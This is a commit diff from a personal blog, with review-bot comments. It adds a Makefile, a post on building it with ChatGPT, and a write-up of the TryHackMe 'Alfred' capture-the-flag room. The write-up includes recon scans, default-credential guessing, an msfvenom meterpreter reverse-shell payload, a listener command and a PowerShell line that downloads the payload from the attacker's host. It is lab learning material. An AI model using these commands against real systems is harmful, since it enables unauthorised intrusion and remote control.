Commit 6cab227 (parent e134e47)
Published THM: Alfred, THM: GameZone, Making Life easy and migrated to Make
Showing 11 changed files with 437 additions and 49 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
# Makefile for building and publishing a site | ||
# Directories | ||
PUBLIC_DIR := public | ||
POSTS_DIR := $(PUBLIC_DIR)/posts | ||
|
||
# Targets | ||
.DEFAULT_GOAL := local | ||
|
||
# Remove local directory | ||
clean: | ||
echo "Cleaning public dir" | ||
@if [ -d $(PUBLIC_DIR) ]; then \ | ||
rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \ | ||
fi | ||
|
||
# Build the site using Emacs | ||
build: clean | ||
echo "Building the site" | ||
emacs -Q --script build-site.el | ||
|
||
# Add latest posts to /index.html | ||
add_latest_posts: | ||
echo "Adding latest posts (archive) on /index.html" | ||
echo '<ul class="org-ul indexul">' > /tmp/index | ||
grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index | ||
echo '</ul>' >> /tmp/index | ||
sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html | ||
|
||
# Copy /index.html to /posts/index.html | ||
copy_index_to_posts: | ||
echo "Copying /index to /posts/index" | ||
cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html | ||
|
||
# Serve the public directory on localhost using Python | ||
serve_local: | ||
cd $(PUBLIC_DIR) && python3 -m http.server | ||
|
||
# Build the site locally | ||
local: build add_latest_posts copy_index_to_posts serve_local | ||
blog: build add_latest_posts copy_index_to_posts |
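Review bot: `serve_local` (and so the default goal `local`) runs `python3 -m http.server` with no `--bind`, which listens on all interfaces, so the "local" preview of the generated site is reachable from every host on the same network; for a preview target use `cd $(PUBLIC_DIR) && python3 -m http.server --bind 127.0.0.1`. Two smaller points in the same file: `add_latest_posts` writes to the fixed, world-shared path `/tmp/index` (predictable name, never removed afterwards, and a pre-existing file or symlink there is silently followed by the `>` redirection), so create the scratch file with `mktemp` or keep it under `$(PUBLIC_DIR)`; and none of `clean`, `build`, `add_latest_posts`, `copy_index_to_posts`, `serve_local`, `local` and `blog` are declared `.PHONY`, so a stray file named `build` or `clean` in the repository root would make that step a silent no-op.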
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,126 @@ | ||
#+TITLE: THM: Alfred | ||
#+DATE: <2023-11-30 14:34> | ||
#+DESCRIPTION: | ||
#+FILETAGS: thm ctf | ||
|
||
* Intro: Be Yourself :noexport: | ||
|
||
Sometimes clashing with others, even temporarily, is unavoidable. | ||
|
||
|
||
* Intro | ||
This time, other than just populating ~/etc/hosts~ with ~alfred.thm~, I | ||
also ran the following, to help me use my /standardized/ notes. | ||
#+NAME: add to all shell | ||
#+begin_src bash | ||
echo "export IP=alfred.thm" >> ~/.bashrc | ||
#+end_src | ||
|
||
* Reconnaissance | ||
Simple nmap scan to find our open tcp ports: | ||
#+begin_src bash | ||
nmap -sV -sC -oN nmap.initial $IP | ||
#+end_src | ||
|
||
And this gives us: | ||
- [ ] 80 (HTTP) | ||
- [ ] 3389 (TCpwrapped) - Alfred | ||
- [ ] 8080 (HTTP) | ||
|
||
** Web Analysis: Port 80 Web Server | ||
- Minimal starting web page, started gobuster while trying the usual | ||
spots. Nothing of interest came up | ||
- Gobuster with big revealed nothing | ||
|
||
#+NAME: Gobuster with IP and default path | ||
#+begin_src bash | ||
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -u http://$IP -o gobuster.big | ||
#+end_src | ||
|
||
** Web Analysis: Port 8080 Web Server | ||
- Jenkins entry portal | ||
- Robots.txt disallows everything on root | ||
- The password is at this point unknown | ||
- I searched online for the default (and popular) credentials: | ||
- Admin:password (did not work) | ||
- Admin:admin (did not work) | ||
- some other combs | ||
- found the actual one | ||
|
||
#+begin_comment | ||
admin:admin | ||
#+end_comment | ||
#+caption: Jenkins Entry portal | ||
[[file:images/Reconnaissance/20231130_145031_screenshot.png]] | ||
|
||
|
||
|
||
#+begin_quote | ||
At this point I viewed another writeup, to see how they had solved | ||
that step, since my solution was at best sketchy. Hydra bruteforce was | ||
another, better way to go. | ||
#+end_quote | ||
|
||
* Using Alfred | ||
Since I already knew that Alfred is a CI/CD server, even though I had | ||
never worked on it, it was relatively simple: | ||
- I knew there had to be a way to build the projects, and sure enough | ||
that action was *directly* modifiable. | ||
|
||
#+caption: Build configuration screen | ||
[[file:images/Using_Alfred/20231201_231517_screenshot.png]] | ||
|
||
At this point, it is obvious that we need to get initial foothold | ||
through a reverse shell of some kind. I saw the room's suggestion of | ||
uploading and then executing one there, but I first wanted to try it | ||
my way. | ||
|
||
Using [[https://www.revshells.com/][online rev shell generator]], I got a reverse shell, but it did | ||
not exactly look beautiful. Python did not exist on the system, which | ||
made me unable to use the now-standard, pty spawn methodology. | ||
However, that did not stop me from getting the flag. Unlikeable is not unusable. | ||
|
||
#+begin_comment | ||
79007a09481963edf2e1321abd9ae2a0 | ||
#+end_comment | ||
|
||
* Upgrading our shell | ||
The room then suggests that we get a meterpreter shell, which I again, | ||
trying to avoid the /walkthrough/ character of it, did my way. | ||
|
||
** MSFvenom | ||
Just a simple meterpreter reverse shell: | ||
|
||
#+NAME: MSFvenom reverse shell generation | ||
#+begin_src cmd | ||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.67.161 LPORT=6969 -f exe -o reverse.exe | ||
#+end_src | ||
|
||
|
||
** Meterpreter listener | ||
Get the listener up and running | ||
|
||
#+NAME: MSFvenom reverse shell generation | ||
#+begin_src cmd | ||
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.67.161; set lport 6969; exploit" | ||
#+end_src | ||
|
||
** Downloading File | ||
My experience with windows is quite limited and that's why I had to go | ||
into a little bit more research to get this over with :( | ||
|
||
Having found an interesting article in the [[http://blog.commandlinekungfu.com/2009/11/episode-70-tangled-web.html][Command Line Kung Fu]] | ||
blog, I started with the following | ||
#+begin_src cmd | ||
powershell -c '(New-Object System.Net.WebClient).DownloadFile("http://10.10.67.161:8000/reverse.exe","c:\Users\bruce\reverse.exe")' | ||
#+end_src | ||
|
||
But it did not work. Even though it did not return any error codes, I | ||
could see in my simple python server that no requests had been made. | ||
Evidently it did not need that many modifications to work, it is just | ||
that I may have used a syntax that resembled way too much this | ||
procedure in Linux. | ||
|
||
* Privilege escalation | ||
Sadly ~getsystem~ works perfectly, and we get ~NT AUTHORITY\SYSTEM~, | ||
without it being necessary to do anything. |
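Review bot: the two `#+begin_comment` blocks (the `admin:admin` credentials under "Web Analysis: Port 8080 Web Server" and the flag hash under "Using Alfred") are excluded from the exported HTML but are committed in plain text to this public repository, so the comment markers hide them from nobody reading the source; if they are not meant to be published, remove them from the file instead of commenting them out, bearing in mind they stay in history for this commit either way. Smaller points: the listener block under "Meterpreter listener" reuses `#+NAME: MSFvenom reverse shell generation` from the msfvenom block, and Org block names must be unique, so give it its own name; the msfvenom and msfconsole commands run on the Linux attack box, so `#+begin_src bash` fits them better than `cmd`, which is only right for the powershell line; "TCpwrapped" in the port list should read "tcpwrapped"; and "Downloading File" ends at "But it did not work." without showing what eventually did, so either add that step or say it was left unfinished.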
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,96 @@ | ||
#+TITLE: Make-ing my life easier | ||
#+DATE: <2023-12-27 12:25> | ||
#+DESCRIPTION: Notes on how I migrated to Make for this website, so that I can easily preview my posts before publishing | ||
#+FILETAGS: make python blog config | ||
|
||
|
||
* Introduction | ||
#+begin_comment | ||
This is the second article for the day, but it is simply the result of | ||
a longer period of not publishing. | ||
#+end_comment | ||
|
||
At the time of writing my blog directory surely is cluttered, and I | ||
*really* do not want this. It prevents me from easily checking my | ||
website (not sure if the clutter caused my lack of proper at times | ||
documentation or the other way round), but it has to change. Here I | ||
expect to document the next 10 minutes briefly for me, so that it all | ||
makes sense | ||
|
||
* Goal | ||
What I expect to do here is quickly create a makefile, with a ~local~ | ||
set of instructions, that will: | ||
1. Create a ~public~ directory and populate it | ||
2. Launch a python server | ||
|
||
* Execution | ||
Using the ~local-build.sh~ script, I knew this would not take too much. | ||
Being an open source file and not really bothered by the | ||
confidentiality of its contents, I uploaded it to ChatGPT asking for | ||
it to be refactored and documented into a Makefile: | ||
#+begin_example | ||
# Makefile for building and publishing a site | ||
# Directories | ||
PUBLIC_DIR := public | ||
POSTS_DIR := $(PUBLIC_DIR)/posts | ||
|
||
# Targets | ||
.DEFAULT_GOAL := local | ||
|
||
# Remove local directory | ||
clean: | ||
@if [ -d $(PUBLIC_DIR) ]; then \ | ||
rm -rf $(PUBLIC_DIR) && echo "Local directory deleted"; \ | ||
fi | ||
|
||
# Build the site using Emacs | ||
build: clean | ||
emacs -Q --script build-site.el | ||
|
||
# Add latest posts to /index.html | ||
add_latest_posts: | ||
echo "Adding mini archive on /index.html" | ||
echo '<ul class="org-ul indexul">' > /tmp/index | ||
grep "^<li>" $(PUBLIC_DIR)/posts/recents.html | head -5 >> /tmp/index | ||
echo '</ul>' >> /tmp/index | ||
sed -i -e '/Latest Articles<\/a><\/h2>/r /tmp/index' $(PUBLIC_DIR)/index.html | ||
|
||
# Copy /index.html to /posts/index.html | ||
copy_index_to_posts: | ||
echo "Copying /index to /posts/index" | ||
cp $(PUBLIC_DIR)/index.html $(POSTS_DIR)/index.html | ||
|
||
# Build the site locally | ||
local: build add_latest_posts copy_index_to_posts | ||
#+end_example | ||
|
||
It did a good job, which I suppose can also be attributed to the | ||
proper yet by no means extensive commenting on the shell script. | ||
|
||
Adding a new target and updating local does the job: | ||
#+begin_example | ||
# Serve the public directory on localhost using Python | ||
serve_local: | ||
cd $(PUBLIC_DIR) && python -m http.server | ||
#+end_example | ||
|
||
* Completion | ||
At this point everything is perfect, and well documented enough that I | ||
could refactor the whole blog, where spaghetti code is not only | ||
dominant but visible in its basic structure and organization as well, | ||
making it more manageable. | ||
|
||
* Some extra thoughts | ||
It is truly fascinating that I managed within *much less* than fifteen | ||
minutes to: | ||
- make a shell script obsolete | ||
- make another shell script obsolete (further reducing the mess that I | ||
had embraced and my discomfort) | ||
- Better streamline the whole publish sequence by creating a central | ||
file to use (makefile) | ||
- write this simple article | ||
|
||
With *minimal* experience in using and creating Makefiles. In fact, | ||
I thought I could try my hand at creating this manually and googled | ||
*Makefile templates* before realizing what a waste of time this would | ||
be. Ah, what a wonderful and yet peculiar time to be alive! |
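Review bot: the "Goal" section promises that `local` will launch a Python server, but the first `#+begin_example` still ends with `local: build add_latest_posts copy_index_to_posts`, and the "Adding a new target and updating local" snippet shows only the new `serve_local` target and never the updated `local` line, so a reader following the post ends up with no server; add the updated rule (`local: build add_latest_posts copy_index_to_posts serve_local`) to the second example. The snippets have also drifted from the Makefile committed alongside: the post runs `python -m http.server` where the Makefile uses `python3`, and the committed `clean`, `build` and `add_latest_posts` targets carry extra `echo` lines plus a `blog` target the post does not mention, so either paste the final file or say the listing is abridged. Minor wording: "my lack of proper at times documentation" reads more naturally as "my occasional lack of proper documentation".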